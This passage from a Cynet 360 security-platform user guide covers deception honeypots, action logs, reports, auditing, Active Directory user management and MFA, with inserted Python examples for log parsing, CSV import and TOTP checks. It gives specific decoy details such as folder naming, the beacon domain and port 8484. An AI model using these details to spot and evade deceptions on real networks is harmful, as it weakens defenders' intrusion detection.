  • C: Today Scans – Displays the combined number of successfully scanned and failed scanned endpoints.
  • D: Scanned Endpoints – Lists the attempted scans on endpoints by Cynet 360 according to the configuration settings in Scan Groups. See “Scan Groups”.
  • E: Excel – Enables Operators to export the complete or filtered view of the Scanner page.
  • F: Actions – Enables Operators to restart a scan.
Deceptions

Cynet 360 deploys deception entities (honeypots) in your network to lure attackers. When these entities are used, Cynet 360 detects them and raises an alert on the illicit activity.

Each Deception alert contains details about which type of deception was triggered, the attacker IP address, the Victim IP address, hostname, and File name, if applicable.

The types of deceptions are:

  • Deception Users
    • Decoy Users and host names.
  • Deception Files
    • Decoy files
  • Deception Network
    • Decoy hosts and endpoints on the network.

To enable these deceptions:

  • Activate the deception types.
  • Configure the deception types.

Deception Users

Activating Deception Users

To activate deception Users:

  1. On the main menu, click .
  2. In the Scan Groups tab, navigate to Deception Users.
  3. Click Enable Deception Users.

Configuring Deception Users

To configure deception Users:

  • On the main menu, click .
  • Click Deceptions.
  • Click the Users tab.

To create a new deception User:

  • Click Create.
  • Select the Scan Group.
  • Enter a User Name.
  • Enter a Host Name.
  • Enter a User Type.
  • Click Add.

To edit an existing Deception User, click Edit and change the required settings.

To remove an existing Deception User, click Remove.

Deception Files

Cynet 360 supports different types of deception files.

  • Office Documents – Cynet deploys Excel, Word, and PowerPoint documents to the host in a newly created user directory. These files contain beacons. When they are opened, they communicate with the Cynet server and generate an alert. Cynet enables Users to create their own deception files.
  • Remote Desktop Files – Cynet deploys RDP files with saved imitation credentials on the host. When this file is executed, it attempts to connect to the Cynet server with invalid credentials and generates an alert.
  • ODBC – Cynet configures an Open Database Connectivity (ODBC) connection on the host which points to the Cynet server. When this connection is used, it generates an error and an alert.
  • NetBIOS – Cynet can configure network shares on the host, which are monitored. When a session to such a share is opened, an alert is generated.
  • Stored Credentials – Cynet implants invalid credential information in the Windows Credential Manager. If these credentials are obtained by an attacker and used for authentication elsewhere in the environment, an alert is generated.
  • Text Files – Cynet deploys text files to the host containing invalid credentials. These credentials are disguised as domain credentials or as credentials to an internal web application. If either set of invalid credentials is used, an alert is generated.

Deception Office Documents

Cynet creates a new user folder such as C:\Users\admin_c493d82, with a randomly generated account name.

Within this directory, there will be several deception Office documents such as Word (.docx), Excel (.xlsx), and PowerPoint (.pptx) files. These files contain attractive filenames to lure attackers and are placed through the new user directory.

When one of these files is opened with Microsoft Office, the beacon within the document attempts to communicate with the Cynet server as well as the Cynet-controlled Web domain ad-stats.com. This ensures that the Cynet SOC can identify when deception files are opened outside the corporate LAN environment.

Deception RDP Files

Cynet creates a saved RDP connection file in the same directory as described above. The RDP connection file contains invalid credentials. The file attempts an RDP connection to the Cynet server on port TCP 8484 and fails. When the RDP attempt is made, an alert is generated in the Cynet console.

Deception ODBC Connection

ODBC is an open standard API for accessing databases. ODBC statements are used to connect to various databases such as Access, dBase, DB2, Excel, and others. Cynet uses the Windows built-in programming support for ODBC by planting an ODBC connection to a non-existent database in the environment. When an attacker attempts to use this ODBC connection to connect to the invalid database, an alert is generated in the Cynet console.

Cynet implants the ODBC connection by deploying various registry keys to the Windows host. The implanted ODBC can also be found in Control Panel > System & Security > Administrative Tools > Data Sources (ODBC).

To see the implanted connection listed as a SQL Server data source, click the System DSN tab.

Deception Text Files

Cynet can deploy text files with invalid domain credentials within a newly created user directory. Cynet can also deploy text files with credentials for a non-existent internal application. If the domain credentials are used for authentication or if the URL is accessed, an alert is generated in the Cynet console.

Deception Stored Credentials

The Windows Credential Manager is the “digital locker” where Windows stores login credentials on the network. This data can be accessed by Windows or other applications that use the stored credentials. There are three main types of stored credentials in the Credential Manager:

Windows Credentials

Only used by Windows and its services. For example, saved credentials for a network shared folder.

Certificate-based Credentials

Used together with smart card authentication. This is usually configured in higher security networks with Active Directory configured for smart card authentication.

Generic Credentials

General saved credentials that are defined by applications used on the computer. For example, Office365 or Windows Live.

Credentials saved in the Credential Manager are commonly targeted by threat actors. Cynet 360 plants invalid username and password credentials in the Credentials Manager. When a threat actor uses these credentials to authenticate in the environment, an alert is generated.

Activating Deception Files

To activate deception Files:

  • On the main menu, click .
  • In the Scan Groups tab, navigate to Deception Files.
  • Click Enable Deception Files.

Configuring Deception Files

To configure deception Files:

  • On the main menu, click .
  • Click Deceptions.
  • Click the Files tab.

From here you can:

  • Add a new deception file
  • Edit existing deception files
  • Enable deception files in groups

Decoy File Listener Port

This is the listener port that decoy files use when beaconing back to the Cynet server. The protocol used is TCP.

Enabling Decoy Files in a Group

To enable a Deception File in a Group:

  • Click the file name or .
  • Click .
  • Select an option to deploy.

Adding a New Deception File

Users can create a new Decoy File from an existing Office file.

To Add a New Deception File:

  1. From Settings>Deception tab, click Add New Decoy File.
  2. Select a file to use as the Decoy.
  3. Click Generate Test File.
    1. A test Decoy File is downloaded to the destination of your choice.
    2. Enter a file name.
    3. Select a group.
    4. Select file deployment locations.

When this file is accessed, Cynet generates an alert.

Deception Network

Cynet 360 deploys deception entities (honeypots) in your network to lure attackers. When these entities are used, Cynet 360 detects them and generates an alert on the illicit activity.

To enable this feature:

  1. Activate the Deception Network.
  2. Configure the Deception Network.

Activating the Deception Network

To activate the Deception Network:

  • On the main menu, click .
  • Click the Scan Groups tab and navigate to Deception Network.
  • Click Enable, then Save.

Configuring the Deception Network

To configure the Deception Network:

On the main menu, click .

  1. Click the Deception tab.
  2. Click the Network tab.
  3. In the Max Decoy Hosts Per Endpoint field, enter the maximum number of hosts for each endpoint. The default is 10.
  4. In the Select Group field, enter the scan group to configure.
  5. Add a single or multiple decoy.
    • To manually add a single decoy, click Add.
    • To import multiple decoys from a CSV file, click Import.
    • To see how the CSV file must be set up, click Download CSV Example.


Note: You can add and import as many decoys as you want, but only the maximum number will be distributed on your network. The decoys to be uploaded are selected by Cynet 360 at random.

To delete a decoy, select it from the list and click Delete Selected Decoys.

To delete all decoys, click Delete All Decoys.

IMPORTANT: Any change to the list of decoys (adding, importing, or deleting) causes Cynet 360 to automatically select new decoys.


C: The Quick Filter Bar

The Quick Filter Bar enables the Operator to quickly filter actions by file name, host name, IP address, and actions taken.

D: The Actions Area

The Actions Area enables the Operator to export displayed action lists to an Excel file and to take additional remediation actions. See “Analysis Action” and “File Remediation Actions”.

E: The Actions List

This section provides a list of all actions taken on Files, Hosts, Users, and Network traffic.

File Actions Tab

The File Actions tab provides visibility of all actions taken on files in the environment. See “File Remediation Actions”. The File Actions list contains the following information:

  • File Name – The name of the File on which the action was taken.
  • Host Name – The name of the Host on which the action was taken.
  • Host IP – The IP address of the Host on which the action was taken.
  • Time – The time that the file action was initiated.
  • Action Taken – The type of file action taken.
  • Status – The result of the file action taken.
  • Status Info – Additional information about the file action taken.
  • Retries – Select the range of Retry numbers to filter by.
  • Last Retry Time – Delimits the relevant Retry time frame to filter by.

Note: The maximum number of retries is 48.

Analysis Actions Tab

The Analysis Actions tab provides information on all file analysis actions taken on files in the environment.

The Analysis list contains the following information:

  • File Path – The File name and path of the File on which the action was taken.
  • Host Name – The name of the Host on which the action was taken.
  • Hashes – The hash of the file on which the analysis action was taken.
  • Start Time – The time interval during which this action was started.
  • Last Seen – The time interval during which this action was last seen.
  • Static Result – The result of the static analysis on the file.
  • Dynamic Result – The result of the dynamic analysis on the file.

Deep Scans Tab

The Deep Scans tab provides information on all deep scan actions taken on files in the environment. See “Analysis Action” and “Deep Scans”.

The deep scan list contains the following information:

  • Scan ID – A unique identifier for the Deep Scan that was initiated.
  • Host Name – The Host name on which the Deep Scan was initiated.
  • File Name – The File name on which the Deep Scan was initiated.
  • SHA256 – The hash of the file on which the Deep Scan was initiated.
  • Date In – The date and time when the Deep Scan action was initiated.
  • Last Heartbeat – The date and time when the Deep Scanner last checked in with the Cynet server.
  • Status – The last status update from the Deep Scanner.
  • Scan Detail – Details about the deep scan such as duration (in minutes), percentage completed, and the number of actions monitored by the deep scanner.

Decoy Files Actions

The Decoy File Actions tab provides information about all actions taken in relation to decoy or deception files deployed across the system.

  • Root Directory – The name of the Decoy File root directory.
  • Full Path – The full path of the Decoy File.
  • Type – The type of Decoy File.
  • Host Name – The Host Name where the Decoy File is located.
  • Action – The type of action taken.
  • Last Attempt Status – The status of the last attempt.
  • Last Attempt Error Code – The error code of the last attempt.
  • Last Attempt Error Details – The Operator-defined details.
  • Last Attempt Error Time – The time period delimiting the relevant last attempt.

Send to SOC Tab

The Send to SOC tab provides information about all the files that have been sent to the SOC for further analysis or action. The Sent to SOC table contains the following information:

  • File Path – The File name and path of the File on which the action was taken.
  • Host Name – The name of the Host on which the action was taken.
  • Hashes – The hash of the file on which the action was taken.
  • Start Time – The time interval during which this action was started.
  • End Time – The time interval during which this action ended.
  • Status – The status of the action taken.

Host Actions

The Host Actions tab provides information on all actions taken on Hosts in the environment. The Host Actions list contains the following information:

  • Host Name – The Host name on which the action was taken.
  • Time – The time the Host action was initiated.
  • Action Taken – The type of Host action taken.
  • Status – The result of the Host action taken.
  • Status Info – Information about the Host action taken.
  • Extra Details – Additional information about the Host action taken.
  • Retries – Select the range of Retry numbers to filter by.
  • Last Retry Time – Delimits the relevant Retry time frame to filter by.

Note: The maximum number of retries is 48.

Users Actions

The Users Actions tab provides information on all actions taken on Users in the environment. The User Actions list contains the following information:

  • User Name – The User account on which the action was taken.
  • Host Name – The Host name on which the User action was taken.
  • Time – The time the User action was initiated.
  • Action Taken – The type of User action taken.
  • Status – The result of the User action taken.
  • Status Info – Information about the User action taken.
  • Retries – Select the range of Retry numbers to filter by.
  • Last Retry Time – Delimits the relevant Retry time frame to filter by.

Note: The maximum number of retries is 48.

Network Actions

The Network Actions tab provides visibility of all actions taken on network traffic in the environment. (See also “Taking Remediation Actions”.) The Network Actions list contains the following information:

  • Network Name – The Network object on which the action was taken.
  • Host Name – The Host name on which the Network action was taken.
  • Time – The time the Network action was initiated.
  • Action Taken – The type of Network action taken.
  • Status – The result of the Network action taken.
  • Status Info – Information about the Network action taken.
  • Retries – Select the range of Retry numbers to filter by.
  • Last Retry Time – Delimits the relevant Retry time frame to filter by.

Note: The maximum number of retries is 48.

Running Manual Scans

The Manual Scans page enables Operators to initiate a manual scan of a Host and to view the status of an initiated manual scan.

This applies only to Interval mode.

The Manual Scans Page has three main sections:

  • A: Host Name / IP – Enter the Host Name or the IP address of a Host to be manually scanned.
  • B: Quick Filter – Enables Operators to quickly filter manually-scanned hosts by Scan Date, IP/Hostname, Distribution Type, Scan Status, or Scan Details.
  • C: Manual Scans List – Lists the endpoints that Cynet 360 attempted to scan using Manual Scans.

IMPORTANT!

Manually-scanned hosts MUST be configured in a Scan Group in Settings. If the host is not part of a configured scan group either by hostname, IP address, IP Range, or Active Directory OU, the manual scan will fail. This is because Cynet 360 does not know which scan credentials or distribution type to use when scanning the host.

Managerial Tasks

Generating Reports

The Reports page enables Operators to generate reports on alerts and risks that are generated by the system.

The main parts of the Reports page are as follows:

  • A: Report Types – Use this drop-down menu to select the report type. There are four types of Reports:
    • Alerts Report
    • Top Risks Report
    • Vulnerability Assessment Report
    • Inventory Report
  • B: Date Range – Select the Date Range for the report.
  • C: Report Filters – You can filter Reports to show All objects, or only Files, Hosts, Users, or Network objects.
  • D: Export Report – Click the Adobe PDF icon to export the Report to PDF format.

Generating Alerts Reports

The Alerts Report contains statistics on all alerts generated by the system within the specified date range. You can filter these reports to show alerts just for Files, Hosts, Users, or Networks.

The Alerts By Type graphic on the Reports page displays alerts by type over the given date range. Each object type is highlighted in a different color.

The Alerts By Status graphic displays the number of alerts based on their current status (open or closed). This graphic indicates the incidence of high, medium, and low severity alerts.

The radar area of the Report displays specific areas associated with these alerts in the given date range. All File, User, Host, and Network traffic generating these alerts is displayed.

To Generate an Alert Report

To generate an Alert Report:

  1. From the scroll-down menu, select Alert Report.
  2. In the Date Range fields, enter the start and end date.
  3. Click Go.
  4. Click .

A PDF report is generated.

Generating Top Risks Report

The Top Risks Report displays reports for the Files, Hosts, Users, and Network traffic with the highest risk levels.

The 10 Most Risky Files graphic displays the riskiest objects based on the current Report filters you have selected.

The remaining part of this report displays the riskiest objects as well as some additional details.

To generate a Top Risk Report

  1. In the Date Range fields, enter the start and end date.
  2. From the scroll-down menu, select Top Risk Report.
  3. Click .

A PDF report is generated.

Generating Vulnerabilities Assessment (VA) Reports

VA Reports produce operational data generated by the system based on the VA configuration. There are four options for these reports:

  • Missing KBs on Host (Microsoft OS patch)
  • Agent Validation (Security policy compliance)
  • Application Patches Validation (3rd party application patch validation, for example, Java, Adobe)
  • Unauthorized Applications

Each of the reports generates and downloads as a CSV file. You can send these reports to your IT team to resolve these issues.

To Generate a Vulnerability Assessment Report

  1. In the Date Range fields, enter the start and end date.
  2. From the scroll-down menu, select Vulnerability Assessment Report.
  3. From the list of Report Types displayed, select one of the four report types:
    • Missing KBs on Host
    • Agent Validation
    • Application Patch Validation
    • Unauthorized Applications

A CSV file is generated.

Generating Inventory Reports

Inventory Reports produce operational data generated by the system based on the Cynet collection. This is part of the immediate visibility that Cynet provides. Typical Use Cases are:

  • Creating and maintaining Configuration Management Database (CMDB)
  • Understanding what is protected
  • Finding old or non-supported OS

To generate an Inventory Report

  1. In the Date Range fields, enter the start and end date.
  2. From the scroll-down menu, select Inventory Report.
  3. Click Inventory Per Post.

A CSV file is generated.

Note: Disable your web browser’s pop-up blocker for the Cynet web interface. PDF reports are presented in a separate browser tab and might be blocked by the pop-up blocker.

Auditing Actions

The Audit Page provides a full audit trail for all User actions performed in the system. You can save the audit records in the database and in external files.

This section describes how to access and use the Audit trail using the following methods:

  • Cynet UI
  • External Log files

Auditing Using the Cynet UI

To navigate to the Audit page, click the Audit icon.

The Audit page displays all User actions being performed in the system.

The table displays the following information:

  • User Name – The name of the User who executed the action that generated the audit record.
  • Requester IP – The IP address of the host that generated the request.
  • Event Description – Displays details about the action. Includes a short title of the action and might include a JSON payload with additional details.
  • Event Type – The type of the Event.
  • Category – The category of the action in the system. The options are:
    • Settings
    • Remediation
    • Account
    • Alerts
  • Event Time – You can set the time frame for the events that you want to audit by entering the From date and the To date.

You can select the number of entities to display per page. The default is 25.

To export the data to a spreadsheet, click .

Auditing using External Log Files

By default, all audit records are located at the following path: “C:\Cynet360\logs\audit”.

The audit Files are cyclical. For every system restart, or for every 50 MB, a new file is created in the following format: “CF_<CREATE_HOUR>T<CREATE_MINUTE>T<CREATE_SECOND>_<YYYYMMDD>.txt”

The file is text-based and includes all audit records. Each record appears in a new line: “date hour Audit action:<action code>;UserName:<User>; category:<category>; details:<description+Json>”

This is shown in the following example:
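The record layout described above, as an added worked example (not Cynet's own code, and not the screenshot the guide refers to): a parser for the audit file name pattern and the per-line record format, run over constructed sample lines. The action codes, timestamps, user names and JSON payloads are assumed values for illustration, and the example assumes a single space between the date and hour fields, which the guide does not specify.

```python
import json
import re
from datetime import datetime

# Constructed sample records in the layout the guide describes:
#   date hour Audit action:<action code>;UserName:<User>; category:<category>; details:<description+Json>
# Action codes, timestamps and JSON payloads are illustrative, not real Cynet values.
SAMPLE_RECORDS = """\
2020-05-12 09:14:03 Audit action:101;UserName:jsmith; category:Remediation; details:Kill Process {"host": "WS-042", "pid": 4120}
2020-05-12 09:15:40 Audit action:207;UserName:jsmith; category:Settings; details:Scan group updated {"group": "Finance"}
2020-05-12 09:16:02 Audit action:301;UserName:svc-soc; category:Account; details:User created {"user": "analyst2", "level": "Operator"}
2020-05-12 09:16:05 Audit action:301;UserName:svc-soc; category:Account; details:User created
this line is not an audit record
"""

RECORD_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) Audit action:(?P<action>[^;]+);"
    r"UserName:(?P<user>[^;]*); category:(?P<category>[^;]*); details:(?P<details>.*)$"
)
# File name pattern from the guide: CF_<CREATE_HOUR>T<CREATE_MINUTE>T<CREATE_SECOND>_<YYYYMMDD>.txt
FILENAME_RE = re.compile(r"^CF_(\d{2})T(\d{2})T(\d{2})_(\d{8})\.txt$")


def split_details(details):
    """Separate the free-text description from a trailing JSON object, if any."""
    brace = details.find("{")
    if brace == -1:
        return details.strip(), None
    try:
        payload = json.loads(details[brace:])
    except json.JSONDecodeError:
        return details.strip(), None  # keep the raw text when the JSON is malformed
    return details[:brace].strip(), payload


def parse_audit_records(text):
    """Parse audit lines; returns (records, skipped_line_count)."""
    records, skipped = [], 0
    for line in text.splitlines():
        m = RECORD_RE.match(line)
        if not m:
            skipped += 1  # count lines that do not fit the record layout
            continue
        description, payload = split_details(m["details"])
        records.append({
            "timestamp": f"{m['date']} {m['time']}",
            "action": m["action"].strip(),
            "user": m["user"].strip(),
            "category": m["category"].strip(),
            "description": description,
            "payload": payload,
        })
    return records, skipped


def parse_audit_filename(name):
    """Return the creation datetime encoded in an audit file name, or None."""
    m = FILENAME_RE.match(name)
    if not m:
        return None
    hh, mm, ss, ymd = m.groups()
    return datetime.strptime(f"{ymd} {hh}{mm}{ss}", "%Y%m%d %H%M%S")


def actions_by_user(records, category=None):
    """Count actions per user, optionally restricted to one category (e.g. 'Remediation')."""
    counts = {}
    for r in records:
        if category is None or r["category"] == category:
            counts[r["user"]] = counts.get(r["user"], 0) + 1
    return counts
```

Because the files rotate on every restart or every 50 MB, `parse_audit_filename` lets you order a directory of audit files by creation time before concatenating them; `actions_by_user(records, "Remediation")` is the kind of summary an Operator would review to confirm that remediation actions were taken only by the accounts expected to take them.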

Managing Users

Manage Users from the Users page in the Settings menu. This page contains settings for User authentication to the Cynet console. You can add Users, delete Users, and you can edit User permissions. You can also change User passwords.

Integrating with Active Directory

The Active Directory Authentication section contains settings that determine the domains that the Cynet console uses for Active Directory authentication. In this section, you can manage the credentials that Cynet uses within each domain to validate Active Directory User authentication to the console.

To create a new set of credentials, in the Integrations tab, click Create.

The following dialog box opens:

  • Name – An alias for this set of credentials.
  • Username – The User name of the account that is used to validate the credentials.
  • Password – The password of the account that is used to validate the credentials.
  • Domain – The domain in which the account exists.

Note

The account used to validate the credentials does NOT need to be a domain administrator. It only needs to be a domain User.

To check if the Username and password are correct, click Validate Credentials.

To save these credentials, click Save.

The new credentials appear in the Manage Credentials section. To change existing credentials click Edit. To remove credentials click Delete.

When there is at least one set of credentials saved, you can enable Active Directory authentication on the Users settings tab.

Importing User Settings Data from Active Directory (AD)

You can configure Cynet to import User account attributes from Active Directory. To import User attributes from AD:

  1. From the Settings page, select the Configuration tab.
  2. Navigate to the Import Data Settings section.
  3. Select the first field from the scroll-down menu under User Name.
  4. (Optional) Click +.
  5. Select the second field.
  6. Repeat until all the required fields are listed.
  7. Name all the selected fields with the corresponding attributes.
  8. Click Save.

In the example below, each field is mapped to the corresponding attribute name in Active Directory. For example, the Role field is mapped to the ‘title’ attribute.

Note

Active Directory attribute names are case sensitive.

The User data you can import from AD includes:

  • User Name – The User’s account name.
  • Mobile – The User’s mobile phone number.
  • Office Phone – The User’s office phone number.
  • Role – The User’s job title.
  • Department – The department in which the User works.

Notes

The server imports User data from Active Directory once every 24 hours.

You can view imported User data on the User Details Page.

Importing User Settings from a CSV File

You can configure Cynet to import User account attributes from a Comma Separated Values (CSV) file. The User data that you can import from a CSV file includes:

  • User Name – The User’s account name.
  • Mobile – The User’s mobile phone number.
  • Office Phone – The User’s office phone number.
  • Role – The User’s job title.
  • Department – The department in which the User works.

To import User attributes from a CSV file,

From the Settings page, select the Configuration tab.

Navigate to the Import User Data From CSV File section.

Select the first field from the scroll-down menu under User Name.

(Optional) Click +.

Select the second field.

Repeat until all the required fields are listed.

Give a number to each selected field.

That number corresponds to the index of data in the CSV file.

Click Save.

Click Choose File.

Navigate to the location of the CSV file on your computer.

Select the CSV file to upload.

Click Upload CSV File.

The file is parsed according to the field mapping configured in the section above. You can view imported User data on the User Details Page.

In the example below, each field is mapped to the corresponding index of data within the CSV file. For example, the Role field is mapped to index #3 in the CSV file.

The CSV file to match this mapping includes User data like the one below, where the User name field is first, mobile number second, office number third, and so on.
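The two import paths above (AD attribute names and CSV column indexes) are the same operation with a different mapping. The Python below is an added example, not Cynet code: it normalizes User records from either source. The AD attribute names other than 'title' (sAMAccountName, mobile, telephoneNumber, department) are standard Active Directory schema names chosen for this example, the sample entry and CSV rows are constructed, and the CSV indexes are zero-based, which is what makes the guide's own example (User name first, Role at index #3) line up.

```python
import csv
import io

# The five importable User fields from the guide's table.
FIELDS = ("User Name", "Mobile", "Office Phone", "Role", "Department")

# Assumed AD mapping: the guide only states that Role maps to 'title'; the other
# attribute names are standard AD schema names picked for this example.
AD_MAPPING = {
    "User Name": "sAMAccountName",
    "Mobile": "mobile",
    "Office Phone": "telephoneNumber",
    "Role": "title",
    "Department": "department",
}

# CSV mapping: field -> zero-based column index. With User name first, mobile
# second and office phone third, Role lands at index #3 as in the guide.
CSV_MAPPING = {
    "User Name": 0,
    "Mobile": 1,
    "Office Phone": 2,
    "Role": 3,
    "Department": 4,
}


def from_ad(entry, mapping=AD_MAPPING):
    """Build a User record from an AD entry (dict of attribute -> value).

    Lookups are case-sensitive, as the guide notes: a mapping of "Title" will
    not pick up an entry that only carries "title", and the field stays None.
    """
    return {field: entry.get(attr) for field, attr in mapping.items()}


def from_csv(text, mapping=CSV_MAPPING):
    """Parse CSV text into User records using the index mapping.

    Rows too short for the highest configured index are reported as skipped
    instead of silently producing partial records.
    """
    records, skipped = [], []
    needed = max(mapping.values()) + 1
    for lineno, row in enumerate(csv.reader(io.StringIO(text)), start=1):
        if not row or all(not cell.strip() for cell in row):
            continue  # blank line
        if len(row) < needed:
            skipped.append((lineno, row))
            continue
        records.append({field: row[idx].strip() for field, idx in mapping.items()})
    return records, skipped


# Constructed sample data; not taken from any real directory or file.
SAMPLE_AD_ENTRY = {
    "sAMAccountName": "jdoe",
    "mobile": "+15550100",
    "telephoneNumber": "+15550200",
    "title": "SOC Analyst",
    "department": "Security Operations",
}

SAMPLE_CSV = """jdoe,+15550100,+15550200,SOC Analyst,Security Operations
asmith,+15550101,+15550201,IT Manager,Infrastructure
broken_row,+15550102
"""

if __name__ == "__main__":
    print(from_ad(SAMPLE_AD_ENTRY))
    good, bad = from_csv(SAMPLE_CSV)
    print(good)
    print("skipped rows:", bad)
```

Validating the mapping against a small constructed file like this before uploading the real export is a cheap way to catch an off-by-one in the indexes or a mis-cased attribute name, both of which otherwise surface only as blank fields on the User Details Page a day later.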

Creating New Users

To create a new local User:

From the Settings page, select the Users tab.

Enter the User Name.

Enter the Password.

Select the User Level.

Click Add.

The User Level options are:

Parameter – Description
Custom User – Enables Custom User permissions. You can use the “Custom User Access Permissions” drop-down menu to select which actions this User is enabled to perform.
Operator – Enables Users to view all data, perform remediation actions, make configuration changes, and add, remove, and edit Users.
Dashboard – Enables Users to access the Main Dashboard. Users cannot view data, perform remediation actions, or make any configuration changes.

Custom User Access Permissions

When creating a new User, if Custom User is selected as the User Level, you must assign permissions to the new User.

To assign permissions to the new User:

In the Manage Local Users area, click Edit Permissions.


Click the drop-down arrow.

Click Save.

Activate Chief Information Security Officer (CISO) Kit

The CISO Kit integrates Cynet 360 with a mobile application to enable CISOs to receive warnings from the Cynet 360 system.

The CISO Kit is compatible with iPhone, iPad, and Apple Watch devices. It is a dashboard application that is available for Cynet 360 v3.6.2 and above, for SaaS installations only.

For more information about how to operate the CISO Kit from portable devices, refer to Cynet CISO Kit User Guide.

Adding Users to Groups

Select the Domain from the drop-down menu.

You can configure Domains in the Active Directory section of the Integrations page.

Enter a User name from the selected domain.

Select the User Level.

Authenticated Users in this group are assigned to this User level.

To add the User to this group, click Add.

All Users in this group can authenticate to the console using the Active Directory credentials.

The new Users appear in the Enabled Identities section.

Enabled Identities

When a group or User has been mapped, it appears in the Enabled Identities section.

To remove an enabled identity, click Remove.

Active Directory Authentication Settings

The Active Directory Authentication section maps Users or Groups within Active Directory domains to User levels in the Cynet console for authentication.

Before these settings can be configured, you must configure two other settings:

Integrations

Configure a domain in the Active Directory section of the Integrations settings tab.

Authentication Mode

Enable an authentication mode in the Manage Authentication Users section of the Users tab.

When you have configured the Domain and an Authentication mode, the AD Authentication section becomes available.

Setting the User Authentication Method

You can use this setting to configure which authentication method is enabled for Users when logging into the Cynet console.

To Configure the User Authentication Method:

From the Settings page, select the Users tab.

Select the level of authentication.

Enable Local Authentication Only—Only local Users in the Cynet User database are authenticated.

Enable Active Directory Authentication Only—Only Active Directory Users are authenticated.

Enable Local & Active Directory Authentication—Users from both the Cynet User database and Active Directory are authenticated.

Notes

If an authentication method that uses Active Directory is enabled, the AD Authentication section of settings becomes available. These settings map Users and groups in Active Directory to User levels in the Cynet console for authentication.

You must also configure the Active Directory domain in the Integrations settings. This page points the Cynet console to the domain to validate Active Directory credentials.

Cynet recommends enabling the Local & Active Directory Authentication method so that the Operator account (or any other local account) can be used to log into the console in the event that Active Directory authentication is not possible.

Managing Cynet Users

You can add, edit, or delete Local Users. You can also change User passwords.

The Operator account is the default login for the Cynet console, and it cannot be deleted. Cynet recommends changing the password of the Operator account from the default password to something more complex and secure.

Configuring User SMS Confirmation Settings

This setting enables the SMS Confirmation functionality. When Cynet observes unusual User logins, it sends an SMS to the User’s mapped mobile number.

To enable SMS Confirmation, in the Configuration tab:

Select Enable SMS Confirmations.

Click Save.

Authenticating an Active Directory Group

To add an Active Directory group for Cynet console authentication, in the Users tab:

Select a Domain from the drop-down menu.

The domains are configured in the Active Directory section of the Integrations page.

Select the Active Directory Group to map.

All groups from AD are listed in this drop-down menu.

Select the User Level. Authenticated Users in this group are given this User level.

To add this group, click Add.

All Users in this group are able to authenticate to the console using the Active Directory credentials.

Added Groups appear in Enabled Identities.

Managing Multi-Factor Authentication (MFA)

IMPORTANT!

MFA is available for local Users only.

Activating MFA for a User

To activate and configure the MFA feature for individual Users:

From the Users tab, navigate to Authentication Settings.

Select Enable Local Authentication Only.

Navigate to Manage Local Users.

Next to the relevant User, click Manage MFA.


From the Manage MFA Device window, enter the User’s phone number. The required format is a + followed by the country code, followed by the number. For example, +000123456789.


Click Assign MFA.

The first time the User attempts to login after the MFA is assigned, the phone validation screen opens. Cynet 360 sends a code to the User’s phone by SMS. The User enters that PIN code here.


Note

The PIN code sent by SMS is only valid for three minutes. If required, the User can click Resend SMS to request a new valid code.

The User is redirected to a QR code validation screen. The User either scans the QR code with a Google or Microsoft authenticator app or enters the manual key string.


Subsequent logins will be verified with the code provided by the Google or Microsoft authenticator app.

To resync the MFA or update the phone number, follow the same steps.
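The enrollment flow above has two distinct factors: a short-lived SMS PIN (valid for three minutes) that proves possession of the phone, and a time-based code from a Google or Microsoft authenticator app for every later login. The Python below is an added example, not Cynet code, that walks the same flow: it checks the phone format the guide requires, issues and expires an SMS PIN, and generates and verifies the RFC 6238 TOTP codes those authenticator apps produce. The digit-count bounds in the phone pattern, the six-digit PIN and the one-step clock-drift tolerance are assumptions for this example.

```python
import base64
import hashlib
import hmac
import re
import secrets
import struct
import time

# Phone format per the guide: '+' then country code and number, e.g. +000123456789.
# The 6..15 digit bounds are an assumption for this example (E.164 allows up to 15).
PHONE_RE = re.compile(r"^\+\d{6,15}$")

SMS_PIN_TTL_SECONDS = 180  # the guide: the SMS PIN is valid for three minutes


def valid_phone(number: str) -> bool:
    return bool(PHONE_RE.match(number))


class SmsPin:
    """One-time PIN sent by SMS during enrollment; rejected after three minutes."""

    def __init__(self, issued_at: float, digits: int = 6):
        self.issued_at = issued_at
        self.pin = f"{secrets.randbelow(10 ** digits):0{digits}d}"

    def verify(self, candidate: str, now: float) -> bool:
        if now - self.issued_at > SMS_PIN_TTL_SECONDS:
            return False  # expired: the User must click Resend SMS for a new one
        return hmac.compare_digest(self.pin, candidate)


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP (HMAC-SHA1, 30 s step, 6 digits), the scheme the Google and
    Microsoft authenticator apps use."""
    counter = struct.pack(">Q", unix_time // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    value = (
        (mac[offset] & 0x7F) << 24
        | mac[offset + 1] << 16
        | mac[offset + 2] << 8
        | mac[offset + 3]
    )
    return f"{value % (10 ** digits):0{digits}d}"


def manual_key(secret: bytes) -> str:
    """The 'manual key string' an authenticator accepts instead of the QR code is
    the Base32 encoding of the shared secret (padding stripped)."""
    return base64.b32encode(secret).decode("ascii").rstrip("=")


def verify_totp(secret: bytes, candidate: str, unix_time: int, skew_steps: int = 1) -> bool:
    """Accept the current code and one step either side to tolerate clock drift."""
    for delta in range(-skew_steps, skew_steps + 1):
        if hmac.compare_digest(totp(secret, unix_time + delta * 30), candidate):
            return True
    return False


def enroll_and_login_demo(now=None) -> bool:
    """Walk the guide's flow with the guide's example number and a fresh secret."""
    now = time.time() if now is None else now
    phone = "+000123456789"
    if not valid_phone(phone):
        return False
    pin = SmsPin(issued_at=now)            # Cynet sends the PIN by SMS
    if not pin.verify(pin.pin, now + 60):  # the User types it a minute later
        return False
    secret = secrets.token_bytes(20)       # shown as QR code / manual key
    _ = manual_key(secret)
    app_code = totp(secret, int(now))      # what the authenticator app displays
    return verify_totp(secret, app_code, int(now))


if __name__ == "__main__":
    print("enrollment and first TOTP login:", enroll_and_login_demo())
```

The point a defender should take from this is that the SMS PIN is a one-time enrollment check, while the shared secret behind the QR code is what protects every subsequent login; resyncing the MFA, as the guide describes, replaces that secret.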

Removing MFA for a User


Password Complexity

Passwords must include at least 3 of the following 4 groups:

Lower case letters (a-z)

Upper case letters (A-Z)

Numbers (0-9)

Symbols (!@#$%^&*)

Passwords must be between eight and twenty characters in length.
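The policy above is easy to encode and worth checking in tooling that provisions local Users (for example, a script that creates Dashboard accounts in bulk). The Python below is an added example, not Cynet code; it reports every failed rule at once rather than stopping at the first. Whether characters outside the four listed groups are permitted is not stated in the guide, so this example neither counts them toward a group nor rejects them.

```python
import string

# The four character groups named in the guide; at least three must be present.
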